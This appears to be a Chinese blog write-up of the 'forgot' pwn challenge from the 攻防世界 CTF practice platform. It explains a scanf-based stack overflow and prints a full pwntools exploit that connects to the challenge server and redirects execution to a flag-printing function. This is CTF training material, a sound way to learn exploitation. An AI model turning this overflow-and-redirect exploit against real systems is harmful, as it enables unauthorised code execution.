攻防世界2

樊少泽2024-10-13 22:21

forgot

发现是32位文件

fgets(s, 32, stdin)限制读入32位字符,无法利用

__isoc99_scanf("%s", v2) 典型的栈溢出

发现cat flag

覆盖v2-v3,覆盖为cat flag的函数地址

exp:

python 复制代码 
from pwn import *
context(os='linux',arch='amd64',log_level='debug')
io = remote('61.147.171.105','56662')
door = 0x80486CC
io.recvuntil(b'>')
payload = b'aaaa'
io.sendline(payload)
io.recvuntil(b'>')
padding = b'a'*(0x74-0x54+0x4)
payload1 = padding + p32(door)
io.sendline(payload1)
io.interactive()
相关推荐
꧁༺朝花夕逝༻꧂1 分钟前
nginx-基础知识
运维·nginx
极小狐16 分钟前
极狐GitLab 安全文件管理功能介绍
linux·运维·数据库·安全·elasticsearch·gitlab
wqq102726 分钟前
docker Windows 存放位置
运维·docker·容器
CURRY_yangyang301 小时前
lvs + keepalived + dns 高可用
linux·服务器·lvs·keepalived
欧阳潇瑞1 小时前
ubuntu磁盘挂载
linux·运维·服务器
大叔是90后大叔2 小时前
linux安装node版本管理工具(nvm和fnm)
linux·服务器
四岁爱上了她2 小时前
CentOS更换yum源
linux·运维·centos
再学一丢丢2 小时前
LVS+Keepalived+dns高可用项目架构
运维·服务器
艾伦_耶格宇2 小时前
Linux实验 -6 Linux网卡配置
linux
web守墓人2 小时前
【gpt生成-总览】怎样才算开发了一门编程语言,需要通过什么测试
运维·服务器·gpt
热门推荐
01我决定放弃搞 Java 了02RAG 实践- Ollama+RagFlow 部署本地知识库03DeepSeek各版本说明与优缺点分析04计算机视觉——基于 Yolov8 目标检测与 OpenCV 光流实现目标追踪05Scipy||第三章 线性代数 (scipy.linalg)06如何在WPS和Word/Excel中直接使用DeepSeek功能07【FPGA】——DDS信号发生器设计08汽车上的各种质量:整备质量、总质量、装载质量、簧上质量、簧下质量09本地化部署AI知识库:基于Ollama+DeepSeek+AnythingLLM保姆级教程10鸿蒙界面开发(四):支付宝首页开发实战